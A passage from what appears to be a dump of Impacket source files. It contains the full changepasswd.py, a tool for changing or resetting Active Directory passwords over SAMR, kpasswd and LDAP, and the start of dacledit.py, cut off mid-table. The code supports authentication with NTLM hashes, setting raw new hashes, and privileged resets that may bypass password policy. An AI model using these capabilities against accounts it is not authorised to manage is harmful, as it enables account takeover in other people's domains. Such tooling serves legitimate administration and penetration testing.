https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/acb3204a-da8b-478e-9139-1ea589edb880\n# [MS-SAMR] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/9699d8ca-e1a4-433c-a8c3-d7bebeb01476\n# [MS-SAMR] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/538222f7-1b89-4811-949a-0eac62e38dce\n# [LDAP] https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/change-windows-active-directory-user-password\n# [KPASSWD] https://www.rfc-editor.org/rfc/rfc3244.txt\n# https://snovvcrash.github.io/2020/10/31/pretending-to-be-smbpasswd-with-impacket.html\n# https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/\n# https://github.com/samba-team/samba/blob/master/source3/utils/smbpasswd.c\n# https://github.com/fortra/impacket/pull/381\n# https://github.com/fortra/impacket/pull/1189\n# https://github.com/fortra/impacket/pull/1304\n#\n\nimport argparse\nimport logging\nimport sys\n\nfrom getpass import getpass\n\nfrom impacket import version\nfrom impacket.dcerpc.v5 import transport, samr, epm\nfrom impacket.krb5 import kerberosv5, kpasswd\nfrom impacket.ldap import ldap, ldapasn1\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target, EMPTY_LM_HASH\n\nimport OpenSSL\n\nclass PasswordHandler:\n \"\"\"Generic interface for all the password protocols supported by this script\"\"\"\n\n def __init__(\n self,\n address,\n domain=\"\",\n authUsername=\"\",\n authPassword=\"\",\n authPwdHashLM=\"\",\n authPwdHashNT=\"\",\n doKerberos=False,\n aesKey=\"\",\n kdcHost=None,\n ):\n \"\"\"\n Instantiate password change or reset with the credentials of the account making the changes.\n It can be the target user, or a privileged account.\n\n :param string address: IP address or hostname of the server or domain controller where the password will be changed\n :param string domain: AD domain where the password will be changed\n :param string username: account that will attempt the password change or reset on the target(s)\n :param string password: password of the account that will attempt the password change\n :param string pwdHashLM: LM hash of the account that will attempt the password change\n :param string pwdHashNT: NT hash of the account that will attempt the password change\n :param bool doKerberos: use Kerberos authentication instead of NTLM\n :param string aesKey: AES key for Kerberos authentication\n :param string kdcHost: KDC host\n \"\"\"\n\n self.address = address\n self.domain = domain\n self.username = authUsername\n self.password = authPassword\n self.pwdHashLM = authPwdHashLM\n self.pwdHashNT = authPwdHashNT\n self.doKerberos = doKerberos\n self.aesKey = aesKey\n self.kdcHost = kdcHost\n\n def _changePassword(\n self, targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n \"\"\"Implementation of a password change\"\"\"\n raise NotImplementedError\n\n def changePassword(\n self,\n targetUsername=None,\n targetDomain=None,\n oldPassword=None,\n newPassword=\"\",\n oldPwdHashLM=None,\n oldPwdHashNT=None,\n newPwdHashLM=\"\",\n newPwdHashNT=\"\",\n ):\n \"\"\"\n Change the password of a target account, knowing the previous password.\n\n :param string targetUsername: account whose password will be changed, if different from the user performing the change\n :param string targetDomain: domain of the account\n :param string oldPassword: current password\n :param string newPassword: new password\n :param string oldPwdHashLM: current password, as LM hash\n :param string oldPwdHashMT: current password, as NT hash\n :param string newPwdHashLM: new password, as LM hash\n :param string newPwdHashMT: new password, as NT hash\n\n :return bool success\n \"\"\"\n\n if targetUsername is None:\n # changing self\n targetUsername = self.username\n\n if targetDomain is None:\n targetDomain = self.domain\n if oldPassword is None:\n oldPassword = self.password\n if oldPwdHashLM is None:\n oldPwdHashLM = self.pwdHashLM\n if oldPwdHashNT is None:\n oldPwdHashNT = self.pwdHashNT\n\n logging.info(f\"Changing the password of {targetDomain}\\\\{targetUsername}\")\n return self._changePassword(\n targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n )\n\n def _setPassword(self, targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT):\n \"\"\"Implementation of a password set\"\"\"\n raise NotImplementedError\n\n def setPassword(self, targetUsername, targetDomain=None, newPassword=\"\", newPwdHashLM=\"\", newPwdHashNT=\"\"):\n \"\"\"\n Set or Reset the password of a target account, with privileges.\n\n :param string targetUsername: account whose password will be changed\n :param string targetDomain: domain of the account\n :param string newPassword: new password\n :param string newPwdHashLM: new password, as LM hash\n :param string newPwdHashMT: new password, as NT hash\n\n :return bool success\n \"\"\"\n\n if targetDomain is None:\n targetDomain = self.domain\n\n logging.info(f\"Setting the password of {targetDomain}\\\\{targetUsername} as {self.domain}\\\\{self.username}\")\n return self._setPassword(targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT)\n\n\nclass KPassword(PasswordHandler):\n \"\"\"Use Kerberos Change-Password or Set-Password protocols (rfc3244) to change passwords\"\"\"\n\n def _changePassword(\n self, targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n if targetUsername != self.username:\n logging.critical(\"KPassword does not support changing the password of another user (try setPassword instead)\")\n return False\n\n if not newPassword:\n logging.critical(\"KPassword requires the new password as plaintext\")\n return False\n\n try:\n logging.debug(\n (\n targetUsername,\n targetDomain,\n newPassword,\n oldPassword,\n oldPwdHashLM,\n oldPwdHashNT,\n self.aesKey,\n self.kdcHost,\n )\n )\n kpasswd.changePassword(\n targetUsername,\n targetDomain,\n newPassword,\n oldPassword,\n oldPwdHashLM,\n oldPwdHashNT,\n aesKey=self.aesKey,\n kdcHost=self.kdcHost,\n )\n except (kerberosv5.KerberosError, kpasswd.KPasswdError) as e:\n logging.error(f\"Password not changed: {e}\")\n return False\n\n logging.info(\"Password was changed successfully.\")\n return True\n\n def _setPassword(self, targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT):\n if not newPassword:\n logging.critical(\"KPassword requires the new password as plaintext\")\n return False\n\n try:\n kpasswd.setPassword(\n self.username,\n self.domain,\n targetUsername,\n targetDomain,\n newPassword,\n self.password,\n self.pwdHashLM,\n self.pwdHashNT,\n aesKey=self.aesKey,\n kdcHost=self.kdcHost,\n )\n except (kerberosv5.KerberosError, kpasswd.KPasswdError) as e:\n logging.error(f\"Password not changed for {targetDomain}\\\\{targetUsername}: {e}\")\n return False\n\n logging.info(f\"Password was set successfully for {targetDomain}\\\\{targetUsername}.\")\n return True\n\n\nclass SamrPassword(PasswordHandler):\n \"\"\"Use MS-SAMR protocol to change or reset the password of a user\"\"\"\n\n # our binding with SAMR\n dce = None\n anonymous = False\n\n def rpctransport(self):\n \"\"\"\n Return a new transport for our RPC/DCE.\n\n :return rpc: RPC transport instance\n \"\"\"\n raise NotImplementedError\n\n def authenticate(self, anonymous=False):\n \"\"\"\n Instantiate a new transport and try to authenticate\n\n :param bool anonymous: Attempt a null binding\n :return dce: DCE/RPC, bound to SAMR\n \"\"\"\n\n rpctransport = self.rpctransport()\n\n if hasattr(rpctransport, \"set_credentials\"):\n # This method exists only for selected protocol sequences.\n if anonymous:\n rpctransport.set_credentials(username=\"\", password=\"\", domain=\"\", lmhash=\"\", nthash=\"\", aesKey=\"\")\n else:\n rpctransport.set_credentials(\n self.username,\n self.password,\n self.domain,\n self.pwdHashLM,\n self.pwdHashNT,\n aesKey=self.aesKey,\n )\n\n if anonymous:\n self.anonymous = True\n rpctransport.set_kerberos(False, None)\n else:\n self.anonymous = False\n rpctransport.set_kerberos(self.doKerberos, self.kdcHost)\n\n as_user = \"null session\" if anonymous else f\"{self.domain}\\\\{self.username}\"\n logging.info(f\"Connecting to DCE/RPC as {as_user}\")\n\n dce = rpctransport.get_dce_rpc()\n dce.connect()\n\n dce.bind(samr.MSRPC_UUID_SAMR)\n logging.debug(\"Successfully bound to SAMR\")\n return dce\n\n def connect(self, retry_if_expired=False):\n \"\"\"\n Connect to SAMR using our transport protocol.\n\n This method must instantiate self.dce\n\n :param bool retry_if_expired: Retry as null binding if our password is expired\n :return bool: success\n \"\"\"\n\n if self.dce:\n # Already connected\n return True\n\n try:\n self.dce = self.authenticate(anonymous=False)\n\n except Exception as e:\n if any(msg in str(e) for msg in (\"STATUS_PASSWORD_MUST_CHANGE\", \"STATUS_PASSWORD_EXPIRED\")):\n if retry_if_expired:\n logging.warning(\"Password is expired or must be changed, trying to bind with a null session.\")\n self.dce = self.authenticate(anonymous=True)\n else:\n logging.critical(\n \"Cannot set new NTLM hashes when current password is expired. Provide a plaintext value for the \"\n \"new password.\"\n )\n logging.debug(str(e))\n return False\n elif \"STATUS_LOGON_FAILURE\" in str(e):\n logging.critical(\"Authentication failure when connecting to RPC: wrong credentials?\")\n logging.debug(str(e))\n return False\n elif \"STATUS_ACCOUNT_RESTRICTION\" in str(e):\n logging.critical(\n \"Account restriction: username and credentials are valid, but some other restriction prevents\"\n \"authentication, like 'Protected Users' group or time-of-day restriction\"\n )\n logging.debug(str(e))\n return False\n elif \"STATUS_ACCOUNT_DISABLED\" in str(e):\n logging.critical(\"The account is currently disabled.\")\n logging.debug(str(e))\n return False\n else:\n raise e\n\n return True\n\n def hSamrOpenUser(self, username):\n \"\"\"Open an handle on the target user\"\"\"\n try:\n serverHandle = samr.hSamrConnect(self.dce, self.address + \"\\x00\")[\"ServerHandle\"]\n domainSID = samr.hSamrLookupDomainInSamServer(self.dce, serverHandle, self.domain)[\"DomainId\"]\n domainHandle = samr.hSamrOpenDomain(self.dce, serverHandle, domainId=domainSID)[\"DomainHandle\"]\n userRID = samr.hSamrLookupNamesInDomain(self.dce, domainHandle, (username,))[\"RelativeIds\"][\"Element\"][0]\n userHandle = samr.hSamrOpenUser(self.dce, domainHandle, userId=userRID)[\"UserHandle\"]\n except Exception as e:\n if \"STATUS_NO_SUCH_DOMAIN\" in str(e):\n logging.critical(\n \"Wrong realm. Try to set the domain name for the target user account explicitly in format \"\n \"DOMAIN/username.\"\n )\n logging.debug(str(e))\n return False\n elif self.anonymous and \"STATUS_ACCESS_DENIED\" in str(e):\n logging.critical(\n \"Our anonymous session cannot get a handle to the target user. \"\n \"Retry with a user whose password is not expired.\"\n )\n logging.debug(str(e))\n return False\n elif \"STATUS_ACCESS_DENIED\" in str(e):\n logging.critical(\"Access denied\")\n logging.debug(str(e))\n return False\n else:\n raise e\n\n return userHandle\n\n def _SamrWrapper(self, samrProcedure, *args, _change=True, **kwargs):\n \"\"\"\n Handles common errors when changing/resetting the password, regardless of the procedure\n\n :param callable samrProcedure: Function that will send the SAMR call\n args and kwargs are passed verbatim\n :param bool _change: Used for more precise error reporting,\n True if it is a password change, False if it is a reset\n \"\"\"\n logging.debug(f\"Sending SAMR call {samrProcedure.__name__}\")\n try:\n resp = samrProcedure(self.dce, *args, **kwargs)\n except Exception as e:\n if \"STATUS_PASSWORD_RESTRICTION\" in str(e):\n logging.critical(\n \"Some password update rule has been violated. For example, the password history policy may prohibit the \"\n \"use of recent passwords or the password may not meet length criteria.\"\n )\n logging.debug(str(e))\n return False\n elif \"STATUS_ACCESS_DENIED\" in str(e):\n if _change:\n logging.critical(\"Target user is not allowed to change their own password\")\n else:\n logging.critical(f\"{self.domain}\\\\{self.username} user is not allowed to set the password of the target\")\n logging.debug(str(e))\n return False\n else:\n raise e\n\n if resp[\"ErrorCode\"] == 0:\n logging.info(\"Password was changed successfully.\")\n return True\n\n logging.error(\"Non-zero return code, something weird happened.\")\n resp.dump()\n return False\n\n def hSamrUnicodeChangePasswordUser2(\n self, username, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n return self._SamrWrapper(\n samr.hSamrUnicodeChangePasswordUser2,\n \"\\x00\",\n username,\n oldPassword,\n newPassword,\n oldPwdHashLM,\n oldPwdHashNT,\n _change=True,\n )\n\n def hSamrChangePasswordUser(\n self, username, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n userHandle = self.hSamrOpenUser(username)\n if not userHandle:\n return False\n\n return self._SamrWrapper(\n samr.hSamrChangePasswordUser,\n userHandle,\n oldPassword=oldPassword,\n newPassword=newPassword,\n oldPwdHashNT=oldPwdHashNT,\n newPwdHashLM=newPwdHashLM,\n newPwdHashNT=newPwdHashNT,\n _change=True,\n )\n\n def hSamrSetInformationUser(self, username, newPassword, newPwdHashLM, newPwdHashNT):\n userHandle = self.hSamrOpenUser(username)\n if not userHandle:\n return False\n\n return self._SamrWrapper(samr.hSamrSetNTInternal1, userHandle, newPassword, newPwdHashNT, _change=False)\n\n def _changePassword(\n self, targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n if not self.connect(retry_if_expired=True):\n return False\n\n if newPassword:\n # If using a plaintext value for the new password\n return self.hSamrUnicodeChangePasswordUser2(\n targetUsername, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, \"\", \"\"\n )\n else:\n # If using NTLM hashes for the new password\n res = self.hSamrChangePasswordUser(\n targetUsername, oldPassword, \"\", oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n )\n if res:\n logging.warning(\"User might need to change their password at next logon because we set hashes (unless password never expires is set).\")\n return res\n\n def _setPassword(self, targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT):\n if not self.connect(retry_if_expired=False):\n return False\n\n # If resetting the password with admin privileges\n res = self.hSamrSetInformationUser(targetUsername, newPassword, newPwdHashLM, newPwdHashNT)\n if res:\n logging.warning(\"User no longer has valid AES keys for Kerberos, until they change their password again.\")\n return res\n\n\nclass RpcPassword(SamrPassword):\n def rpctransport(self):\n stringBinding = epm.hept_map(self.address, samr.MSRPC_UUID_SAMR, protocol=\"ncacn_ip_tcp\")\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n rpctransport.setRemoteHost(self.address)\n return rpctransport\n\n def _changePassword(\n self, targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n if not newPassword:\n logging.warning(\n \"MS-RPC transport requires new password in plaintext in default Active Directory configuration. Trying anyway.\"\n )\n return super()._changePassword(\n targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n )\n\n def _setPassword(self, targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT):\n logging.warning(\n \"MS-RPC transport does not allow password reset in default Active Directory configuration. Trying anyway.\"\n )\n return super()._setPassword(targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT)\n\n\nclass SmbPassword(SamrPassword):\n def rpctransport(self):\n return transport.SMBTransport(self.address, filename=r\"\\samr\")\n\n\nclass LdapPassword(PasswordHandler):\n \"\"\"Use LDAP to change or reset a user's password\"\"\"\n\n ldapConnection = None\n baseDN = None\n\n def connect(self, targetDomain):\n \"\"\"Connect to LDAPS with the credentials provided in __init__\"\"\"\n\n if self.ldapConnection:\n return True\n\n ldapURI = \"ldaps://\" + self.address\n self.baseDN = \"DC=\" + \",DC=\".join(targetDomain.split(\".\"))\n\n logging.debug(f\"Connecting to {ldapURI} as {self.domain}\\\\{self.username}\")\n try:\n ldapConnection = ldap.LDAPConnection(ldapURI, self.baseDN, self.address)\n if not self.doKerberos:\n ldapConnection.login(self.username, self.password, self.domain, self.pwdHashLM, self.pwdHashNT)\n else:\n ldapConnection.kerberosLogin(\n self.username,\n self.password,\n self.domain,\n self.pwdHashLM,\n self.pwdHashNT,\n self.aesKey,\n kdcHost=self.kdcHost,\n )\n except (ldap.LDAPSessionError, OpenSSL.SSL.SysCallError) as e:\n logging.error(f\"Cannot connect to {ldapURI} as {self.domain}\\\\{self.username}: {e}\")\n return False\n\n self.ldapConnection = ldapConnection\n return True\n\n def encodeLdapPassword(self, password):\n \"\"\"\n Encode the password according to Microsoft's specifications\n\n Password must be surrounded by quotes and UTF-16 encoded\n \"\"\"\n return f'\"{password}\"'.encode(\"utf-16-le\")\n\n def findTargetDN(self, targetUsername, targetDomain):\n \"\"\"Find the DN of the targeted user\"\"\"\n\n answers = self.ldapConnection.search(\n searchFilter=f\"(sAMAccountName={targetUsername})\",\n searchBase=self.baseDN,\n attributes=(\"distinguishedName\",),\n )\n\n # return the DN of the first item\n for item in answers:\n if not isinstance(item, ldapasn1.SearchResultEntry):\n # skipping references to other partitions\n continue\n\n return str(item[\"objectName\"])\n\n def _modifyPassword(self, change, targetUsername, targetDomain, oldPasswordEncoded, newPasswordEncoded):\n if not self.connect(targetDomain):\n return False\n\n targetDN = self.findTargetDN(targetUsername, targetDomain)\n if not targetDN:\n logging.critical(\"Could not find the target user in LDAP\")\n return False\n\n logging.debug(f\"Found target distinguishedName: {targetDN}\")\n\n # Build our Modify request\n request = ldapasn1.ModifyRequest()\n request[\"object\"] = targetDN\n\n if change:\n request[\"changes\"][0][\"operation\"] = ldapasn1.Operation(\"delete\")\n request[\"changes\"][0][\"modification\"][\"type\"] = \"unicodePwd\"\n request[\"changes\"][0][\"modification\"][\"vals\"][0] = oldPasswordEncoded\n request[\"changes\"][1][\"operation\"] = ldapasn1.Operation(\"add\")\n request[\"changes\"][1][\"modification\"][\"type\"] = \"unicodePwd\"\n request[\"changes\"][1][\"modification\"][\"vals\"][0] = newPasswordEncoded\n else:\n request[\"changes\"][0][\"operation\"] = ldapasn1.Operation(\"replace\")\n request[\"changes\"][0][\"modification\"][\"type\"] = \"unicodePwd\"\n request[\"changes\"][0][\"modification\"][\"vals\"][0] = newPasswordEncoded\n\n logging.debug(f\"Sending: {str(request)}\")\n\n response = self.ldapConnection.sendReceive(request)[0]\n\n logging.debug(f\"Receiving: {str(response)}\")\n\n resultCode = int(response[\"protocolOp\"][\"modifyResponse\"][\"resultCode\"])\n result = str(ldapasn1.ResultCode(resultCode))\n diagMessage = str(response[\"protocolOp\"][\"modifyResponse\"][\"diagnosticMessage\"])\n\n if result == \"success\":\n logging.info(f\"Password was changed successfully for {targetDN}\")\n return True\n\n if result == \"constraintViolation\":\n logging.error(\n f\"Could not change the password of {targetDN}, possibly due to the password \"\n \"policy or an invalid oldPassword.\"\n )\n elif result == \"insufficientAccessRights\":\n logging.error(f\"Could not set the password of {targetDN}, {self.domain}\\\\{self.username} has insufficient rights\")\n else:\n logging.error(f\"Could not change the password of {targetDN}. {result}: {diagMessage}\")\n\n return False\n\n def _changePassword(\n self, targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n ):\n \"\"\"\n Change the password of a user.\n\n Must send a delete operation with the oldPassword and an add\n operation with the newPassword in the same modify request.\n \"\"\"\n\n if not oldPassword or not newPassword:\n logging.critical(\"LDAP requires the old and new passwords in plaintext\")\n return False\n\n oldPasswordEncoded = self.encodeLdapPassword(oldPassword)\n newPasswordEncoded = self.encodeLdapPassword(newPassword)\n return self._modifyPassword(True, targetUsername, targetDomain, oldPasswordEncoded, newPasswordEncoded)\n\n def _setPassword(self, targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT):\n \"\"\"\n Set the password of a user.\n\n Must send a modify operation with the newPassword (must have privileges).\n \"\"\"\n\n if not newPassword:\n logging.critical(\"LDAP requires the new password in plaintext\")\n return False\n\n newPasswordEncoded = self.encodeLdapPassword(newPassword)\n return self._modifyPassword(False, targetUsername, targetDomain, None, newPasswordEncoded)\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Change or reset passwords over different protocols.\",\n )\n\n parser.add_argument(\"target\", action=\"store\", help=\"[[domain/]username[:password]@]\")\n parser.add_argument(\"-ts\", action=\"store_true\", help=\"adds timestamp to every logging output\")\n parser.add_argument(\"-debug\", action=\"store_true\", help=\"turn DEBUG output ON\")\n\n group = parser.add_argument_group(\"New credentials for target\")\n exgroup = group.add_mutually_exclusive_group()\n exgroup.add_argument(\"-newpass\", action=\"store\", default=None, help=\"new password\")\n exgroup.add_argument(\n \"-newhashes\",\n action=\"store\",\n default=None,\n metavar=\"LMHASH:NTHASH\",\n help=\"new NTLM hashes, format is NTHASH or LMHASH:NTHASH\",\n )\n\n group = parser.add_argument_group(\"Authentication (target user whose password is changed)\")\n group.add_argument(\n \"-hashes\", action=\"store\", default=None, metavar=\"LMHASH:NTHASH\", help=\"NTLM hashes, format is NTHASH or LMHASH:NTHASH\"\n )\n group.add_argument(\"-no-pass\", action=\"store_true\", help=\"Don't ask for password (useful for Kerberos, -k)\")\n\n group = parser.add_argument_group(\"Authentication (optional, privileged user performing the change)\")\n group.add_argument(\"-altuser\", action=\"store\", default=None, help=\"Alternative username\")\n exgroup = group.add_mutually_exclusive_group()\n exgroup.add_argument(\"-altpass\", action=\"store\", default=None, help=\"Alternative password\")\n exgroup.add_argument(\n \"-althash\", \"-althashes\", action=\"store\", default=None, help=\"Alternative NT hash, format is NTHASH or LMHASH:NTHASH\"\n )\n\n group = parser.add_argument_group(\"Method of operations\")\n group.add_argument(\n \"-protocol\",\n \"-p\",\n action=\"store\",\n help=\"Protocol to use for password change/reset\",\n default=\"smb-samr\",\n choices=(\n \"smb-samr\",\n \"rpc-samr\",\n \"kpasswd\",\n \"ldap\",\n ),\n )\n group.add_argument(\n \"-reset\",\n \"-admin\",\n action=\"store_true\",\n help=\"Try to reset the password with privileges (may bypass some password policies)\",\n )\n\n group = parser.add_argument_group(\n \"Kerberos authentication\", description=\"Applicable to the authenticating user (-altuser if defined, else target)\"\n )\n group.add_argument(\n \"-k\",\n action=\"store_true\",\n help=(\n \"Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. \"\n \"If valid credentials cannot be found, it will use the ones specified in the command line\"\n ),\n )\n group.add_argument(\n \"-aesKey\", action=\"store\", metavar=\"hex key\", help=\"AES key to use for Kerberos Authentication (128 or 256 bits)\"\n )\n group.add_argument(\n \"-dc-ip\",\n action=\"store\",\n metavar=\"ip address\",\n help=(\n \"IP Address of the domain controller, for Kerberos. If omitted it will use the domain part (FQDN) specified \"\n \"in the target parameter\"\n ),\n )\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n print(version.BANNER)\n\n options = parse_args()\n logger.init(options.ts, options.debug)\n\n handlers = {\n \"kpasswd\": KPassword,\n \"rpc-samr\": RpcPassword,\n \"smb-samr\": SmbPassword,\n \"ldap\": LdapPassword,\n }\n\n try:\n PasswordProtocol = handlers[options.protocol]\n except KeyError:\n logging.critical(f\"Unsupported password protocol {options.protocol}\")\n sys.exit(1)\n\n # Parse account whose password is changed\n targetDomain, targetUsername, oldPassword, address = parse_target(options.target)\n\n if not targetDomain:\n if options.protocol in (\"rpc-samr\", \"smb-samr\"):\n targetDomain = \"Builtin\"\n else:\n targetDomain = address\n\n if options.hashes is not None:\n try:\n oldPwdHashLM, oldPwdHashNT = options.hashes.split(\":\")\n except ValueError:\n oldPwdHashLM = EMPTY_LM_HASH\n oldPwdHashNT = options.hashes\n else:\n oldPwdHashLM = \"\"\n oldPwdHashNT = \"\"\n\n if oldPassword == \"\" and oldPwdHashNT == \"\":\n if options.reset:\n pass # no need for old one when we reset\n elif options.no_pass:\n logging.info(\"Current password not given: will use KRB5CCNAME\")\n else:\n try:\n oldPassword = getpass(\"Current password: \")\n except KeyboardInterrupt:\n print()\n logging.warning(\"Cancelled\")\n sys.exit(130)\n\n if options.newhashes is not None:\n newPassword = \"\"\n try:\n newPwdHashLM, newPwdHashNT = options.newhashes.split(\":\")\n if not newPwdHashLM:\n newPwdHashLM = EMPTY_LM_HASH\n except ValueError:\n newPwdHashLM = EMPTY_LM_HASH\n newPwdHashNT = options.newhashes\n else:\n newPwdHashLM = \"\"\n newPwdHashNT = \"\"\n if options.newpass is None:\n try:\n newPassword = getpass(\"New password: \")\n if newPassword != getpass(\"Retype new password: \"):\n logging.critical(\"Passwords do not match, try again.\")\n sys.exit(1)\n except KeyboardInterrupt:\n print()\n logging.warning(\"Cancelled\")\n sys.exit(130)\n else:\n newPassword = options.newpass\n\n # Parse account of password changer\n if options.altuser is not None:\n try:\n authDomain, authUsername = options.altuser.split(\"/\")\n except ValueError:\n authDomain = targetDomain\n authUsername = options.altuser\n\n if options.althash is not None:\n try:\n authPwdHashLM, authPwdHashNT = options.althash.split(\":\")\n except ValueError:\n authPwdHashLM = \"\"\n authPwdHashNT = options.althash\n else:\n authPwdHashLM = \"\"\n authPwdHashNT = \"\"\n\n authPassword = \"\"\n if options.altpass is not None:\n authPassword = options.altpass\n\n if options.altpass is None and options.althash is None and not options.no_pass:\n logging.critical(\n \"Please, provide either alternative password (-altpass) or NT hash (-althash) for authentication, \"\n \"or specify -no-pass if you rely on Kerberos only\"\n )\n sys.exit(1)\n else:\n authDomain = targetDomain\n authUsername = targetUsername\n authPassword = oldPassword\n authPwdHashLM = oldPwdHashLM\n authPwdHashNT = oldPwdHashNT\n\n doKerberos = options.k\n if options.protocol == \"kpasswd\" and not doKerberos:\n logging.debug(\"Using the KPassword protocol implies Kerberos authentication (-k)\")\n doKerberos = True\n\n # Create a password management session\n handler = PasswordProtocol(\n address,\n authDomain,\n authUsername,\n authPassword,\n authPwdHashLM,\n authPwdHashNT,\n doKerberos,\n options.aesKey,\n kdcHost=options.dc_ip,\n )\n\n # Attempt the password change/reset\n if options.reset:\n ret = handler.setPassword(targetUsername, targetDomain, newPassword, newPwdHashLM, newPwdHashNT)\n else:\n if (authDomain, authUsername) != (targetDomain, targetUsername):\n logging.warning(\n f\"Attempting to *change* the password of {targetDomain}/{targetUsername} as {authDomain}/{authUsername}. \"\n \"You may want to use '-reset' to *reset* the password of the target.\"\n )\n\n ret = handler.changePassword(\n targetUsername, targetDomain, oldPassword, newPassword, oldPwdHashLM, oldPwdHashNT, newPwdHashLM, newPwdHashNT\n )\n\n if ret:\n sys.exit(0)\n else:\n sys.exit(1)\n" }, { "path": "examples/dacledit.py", "content": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Python script to read and manage the Discretionary Access Control List of an object\n#\n# Authors:\n# Charlie BROMBERG (@_nwodtuhs)\n# Guillaume DAUMAS (@BlWasp_)\n# Lucien DOUSTALY (@Wlayzz)\n#\n\nimport argparse\nimport binascii\nimport codecs\nimport json\nimport logging\nimport os\nimport sys\nimport traceback\nimport datetime\n\nimport ldap3\nimport ldapdomaindump\nfrom enum import Enum\nfrom ldap3.protocol.formatters.formatters import format_sid\n\nfrom impacket import version\nfrom impacket.examples import logger, utils\nfrom impacket.ldap import ldaptypes\nfrom impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS\nfrom ldap3.utils.conv import escape_filter_chars\nfrom ldap3.protocol.microsoft import security_descriptor_control\nfrom impacket.uuid import string_to_bin, bin_to_string\n\nfrom impacket.examples.utils import init_ldap_session, parse_identity\n\nOBJECT_TYPES_GUID = {}\nOBJECT_TYPES_GUID.update(SCHEMA_OBJECTS)\nOBJECT_TYPES_GUID.update(EXTENDED_RIGHTS)\n\n# Universal SIDs\nWELL_KNOWN_SIDS = {\n 'S-1-0': 'Null Authority',\n 'S-1-0-0': 'Nobody',\n 'S-1-1': 'World Authority',\n 'S-1-1-0': 'Everyone',\n 'S-1-2': 'Local Authority',\n 'S-1-2-0': 'Local',\n 'S-1-2-1': 'Console Logon',\n 'S-1-3': 'Creator Authority',\n 'S-1-3-0': 'Creator Owner',\n 'S-1-3-1': 'Creator Group',\n 'S-1-3-2': 'Creator Owner Server',\n 'S-1-3-3': 'Creator Group Server',\n 'S-1-3-4': 'Owner Rights',\n 'S-1-5-80-0': 'All Services',\n 'S-1-4': 'Non-unique Authority',\n 'S-1-5': 'NT Authority',\n 'S-1-5-1': 'Dialup',\n 'S-1-5-2': 'Network',\n 'S-1-5-3': 'Batch',\n 'S-1-5-4': 'Interactive',\n 'S-1-5-6': 'Service',\n 'S-1-5-7': 'Anonymous',\n 'S-1-5-8': 'Proxy',\n 'S-1-5-9': 'Enterprise Domain Controllers',\n 'S-1-5-10': 'Principal Self',\n 'S-1-5-11': 'Authenticated Users',\n 'S-1-5-12': 'Restricted Code',\n 'S-1-5-13': 'Terminal Server Users',\n 'S-1-5-14': 'Remote Interactive Logon',\n 'S-1-5-15': 'This Organization',\n 'S-1-5-17': 'This Organization',\n 'S-1-5-18': 'Local System',\n 'S-1-5-19': 'NT Authority',\n 'S-1-5-20': 'NT Authority',\n 'S-1-5-32-544': 'Administrators',\n 'S-1-5-32-545': 'Users',\n 'S-1-5-32-546': 'Guests',\n 'S-1-5-32-547': 'Power Users',\n 'S-1-5-32-548': 'Account Operators',\n 'S-1-5-32-549': 'Server Operators',\n 'S-1-5-32-550': 'Print Operators',\n 'S-1-5-32-551': 'Backup Operators',\n 'S-1-5-32-552': 'Replicators',\n 'S-1-5-64-10': 'NTLM Authentication',\n 'S-1-5-64-14': 'SChannel Authentication',\n 'S-1-5-64-21': 'Digest Authority',\n 'S-1-5-80': 'NT Service',\n 'S-1-5-83-0': 'NT VIRTUAL MACHINE\\\\Virtual Machines',\n 'S-1-16-0': 'Untrusted Mandatory Level',\n 'S-1-16-4096': 'Low Mandatory Level',\n 'S-1-16-8192': 'Medium Mandatory Level',\n 'S-1-16-8448': 'Medium Plus Mandatory Level',\n 'S-1-16-12288': 'High Mandatory Level',\n 'S-1-16-16384': 'System Mandatory Level',\n 'S-1-16-20480': 'Protected Process Mandatory Level',\n 'S-1-16-28672': 'Secure Process Mandatory Level',\n 'S-1-5-32-554': 'BUILTIN\\\\Pre-Windows 2000 Compatible Access',\n 'S-1-5-32-555': 'BUILTIN\\\\Remote Desktop Users',\n 'S-1-5-32-557': 'BUILTIN\\\\Incoming Forest 